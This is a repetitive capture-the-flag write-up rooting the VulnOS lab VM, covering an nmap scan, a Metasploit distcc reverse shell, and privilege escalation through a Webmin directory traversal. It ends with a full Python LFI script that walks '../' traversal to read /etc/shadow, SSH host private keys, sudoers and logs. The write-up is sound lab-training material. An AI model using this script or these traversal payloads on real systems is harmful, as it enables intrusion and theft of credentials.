Hello Friends
This solution belongs to VulnOs VM from vulnhub. Hope you'll enjoy it.
So we start with basic nmap scan:-
Searching the exploit for this service brings us to a meatsploit exploit- exploit/unix/misc/distcc_exec
Set up the RHOST IP address and fire up the exploit.
The terminal is not a tty so make it just for eye-candy sake:-
Dirbuster had given a handful amount of results, but that didn't feel necessary to be used except one hint (cgi-bin).
Browsing through the files in /var/www following applications are found hosted, pretty large number.
Lets browse through cgi-bin files.
Now create a cgi script to add a root user-
So here we try to create a user "superb" with password "superbpass" as a super user with this script. Just make sure that this script has executable permissions.
Now all we need is run this script through root user. So, we search for webmin-1.280 exploits. Metasploit has exploit.
The variable "dir" has the value "unauthenticated" and exploit uses 40 in number directory traversals to get the file specified in "RPATH". So, lets check when does webmin break. I created a python script to check for LFI. BTW there is a perl exploit too for this.
Well the "re" module didn't get used in the script.Here I iterate through a loop starting from 1 to 50 for directory traversal using "..%01/"
And guess what, webmin broke at 4th iteration. Hell
So, we can use this script to execute our cgi script.
Make necessary changes in webmin's file path. We need to run shell.cgi file located in /usr/lib/cgi-bin directory.
Now run the script.
Since I knew that script gets the job done in 4 iterations itself, so I didn't wait for more than that. Now time to check the passwd file.
Superb :) so "superb" is now a new user. Lets switch to it.
Hahaha, Game Over buddy.
There are lot many other vulnerabilities too, like phpmyadmin (guessable password), DVWA etc... You can hit them one by one.
Hope you guys enjoyed the show ;)
EDIT: Below is the more modified LFI script which will try to read other possible important files too. If you know of any other important files that are not included here, plz post the names.
This solution belongs to VulnOs VM from vulnhub. Hope you'll enjoy it.
So we start with basic nmap scan:-
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)After spending enough time around the services and trying to exploit them I got success in exploiting "distccd" service hosted on port 3632.
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
3632/tcp open distccd distccd v1 ((Ubuntu 4.4.3-4ubuntu5.1) 4.4.3)
6667/tcp open irc IRCnet ircd
8070/tcp open unknown
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
10000/tcp open http MiniServ 0.01 (Webmin httpd)
41120/tcp open nlockmgr 1-4 (RPC #100021)
48389/tcp open status 1 (RPC #100024)
59544/tcp open mountd 1-3 (RPC #100005)
Searching the exploit for this service brings us to a meatsploit exploit- exploit/unix/misc/distcc_exec
Set up the RHOST IP address and fire up the exploit.
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NsD30rklVB230mY4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NsD30rklVB230mY4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 5 opened (192.168.1.11:4444 -> 192.168.1.6:45453) at 2016-10-23 17:45:45 +0530
tty
not a tty
The terminal is not a tty so make it just for eye-candy sake:-
python -c 'import pty;pty.spawn("/bin/sh");'
$ tty
tty
/dev/pts/2
Dirbuster had given a handful amount of results, but that didn't feel necessary to be used except one hint (cgi-bin).
Browsing through the files in /var/www following applications are found hosted, pretty large number.
$ ls /var/www/There is webmin application, everyone is very fond of it ;) So lets find what privileges does it hold?
DVWA-1.0.8 imgs mutillidae redmine-0.9.6
Hackademic_Challenges[EN] index.html openclinic tikiwiki-1.7.9
dolibarr-3.0.0 index2.html phpsysinfo webERP
egroupware insecure postfixadmin-2.3.1 webmin-1.280
$ ps aux | grep webminExcellent, so now we know that webmin can be used for rooting purpose.
root 1892 0.0 0.9 6736 4676 ? Ss 10:28 0:00 /usr/bin/perl /var/www/webmin-1.280
Lets browse through cgi-bin files.
$ cd /usr/lib/cgi-binLets check the permissions for cgi-bin
$ ls
nagios3 php php5
ls -l ../ | grep cgi-bin777 permissions are a very rewarding permissions.
drwxrwxrwx 3 root root 4096 Oct 23 11:05 cgi-bin
Now create a cgi script to add a root user-
So here we try to create a user "superb" with password "superbpass" as a super user with this script. Just make sure that this script has executable permissions.
Now all we need is run this script through root user. So, we search for webmin-1.280 exploits. Metasploit has exploit.
But I didn't want to depend on metasploit once again. So I look through the exploit's code.msf > search webmin
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin File Disclosure
exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Webmin /file/show.cgi Remote Command Execution
def run
print_status("Attempting to retrieve #{datastore['RPATH']}...")
dir = normalize_uri(datastore['DIR'])
uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
The variable "dir" has the value "unauthenticated" and exploit uses 40 in number directory traversals to get the file specified in "RPATH". So, lets check when does webmin break. I created a python script to check for LFI. BTW there is a perl exploit too for this.
Well the "re" module didn't get used in the script.Here I iterate through a loop starting from 1 to 50 for directory traversal using "..%01/"
And guess what, webmin broke at 4th iteration. Hell
So, we can use this script to execute our cgi script.
Make necessary changes in webmin's file path. We need to run shell.cgi file located in /usr/lib/cgi-bin directory.
Now run the script.
Since I knew that script gets the job done in 4 iterations itself, so I didn't wait for more than that. Now time to check the passwd file.
Superb :) so "superb" is now a new user. Lets switch to it.
Hahaha, Game Over buddy.
There are lot many other vulnerabilities too, like phpmyadmin (guessable password), DVWA etc... You can hit them one by one.
Hope you guys enjoyed the show ;)
EDIT: Below is the more modified LFI script which will try to read other possible important files too. If you know of any other important files that are not included here, plz post the names.
import urllib2,time
testers=['etc/passwd','etc/shadow','etc/issue','etc/profile','etc/services','/proc/version','proc/self/environ','var/log/apache2/access.log','var/log/apache/access.log','var/log/httpd/access','var/log/apache2/access_log','var/log/apache/access.log','var/log/apache/access_log','var/log/httpd/access_log','apache/logs/access','apache/logs/access_log','apache2/logs/access','apache2/logs/access_log','etc/httpd/logs/access_log','etc/httpd/logs/access','var/httpd/logs/access_log','var/httpd/logs/access.log','var/httpd/logs/access','var/www/logs/access_log','var/www/logs/access','usr/local/apache/logs/access_log','usr/local/apache/logs/access.log','usr/local/apache/logs/access','usr/local/apache2/logs/access_log','usr/local/apache2/logs/access.log','usr/local/apache2/logs/access','var/log/access_log','var/log/access','logs/access','logs/access_log','logs/access_log','opt/lampp/logs/access_log','opt/lampp/logs/access.log','opt/lampp/logs/access','opt/xampp/logs/access','opt/xampp/logs/access_log','opt/xampp/logs/access.log','var/log/dmesg','var/log/auth','var/log/auth.log','var/log/secure','etc/crontab','etc/cron*','etc/network/interfaces','etc/resolv.conf','etc/sysconfig/network','etc/networks','etc/sudoers','var/apache2/config.inc','var/lib/mysql/mysql/user.MYD','/root/anaconda-ks.cfg','var/mail/root','/var/spool/mail/root','etc/ssh/ssh_config','etc/ssh/sshd_config','etc/ssh/ssh_host_dsa_key.pub','etc/ssh/ssh_host_dsa_key','etc/ssh/ssh_host_rsa_key.pub','etc/ssh/ssh_host_rsa_key','etc/ssh/ssh_host_key.pub','etc/ssh/ssh_host_key','etc/fstab','etc/group','etc/sysconfig/network','etc/at.allow','etc/at.deny','etc/cron.allow','etc/cron.deny','etc/crontab','etc/anacrontab','var/spool/cron/crontabs/root','etc/syslog.conf','etc/chttp.conf','etc/lighttpd.conf','etc/cups/cupsd.conf','etc/inetd.conf','etc/apache2/apache2.conf','etc/my.conf','etc/httpd/conf/httpd.conf','opt/lampp/etc/httpd.conf','php://input']
address = "http://192.168.1.4/index1.php?help=true&connect=" # FOR THE LATEST APPLICATION I TESTED
#address = "http://192.168.1.3:10000/unauthenticated/"+"..%01/"*i+"etc/shadow" #FOR WEBMIN
#address = "http://192.168.1.3:10000/unauthenticated/"+"..%01/"*i+"usr/lib/cgi-bin/shell.cgi" #FOR WEBMIN
def connect():
for i in range(0,50,1):
iterate = "../"*i
if(i==0):
iterate = "/"
url=address+iterate+"etc/passwd"
print "***** URL= ",url,"\n"
print "[+][+] ",url
try:
res = urllib2.urlopen(url).read()
if ("/bin/" in res):
#if ("root" in res):
#if (":" in res):
print "\n[+][+] Passwd file found at ",i," iteration\n"
raw_input("Press Enter...")
print res
print res
choice=raw_input("\n[+][+] Do you want to look into other standard files? Press 'y' ..")
if(choice=='y' or choice=='Y'):
for item in testers:
url = address+ iterate + item
print url
res = urllib2.urlopen(url).read()
print res
raw_input("\n[+][+]Press enter...\n")
else:
print "You didn't press 'y' or 'Y'. Exiting the script...GoodBye\n"
break
except Exception, err:
print "Exception occured, continuing.."
time.sleep(0.5)
print "[+][+] LOOP NUMBER- ",i
connect()
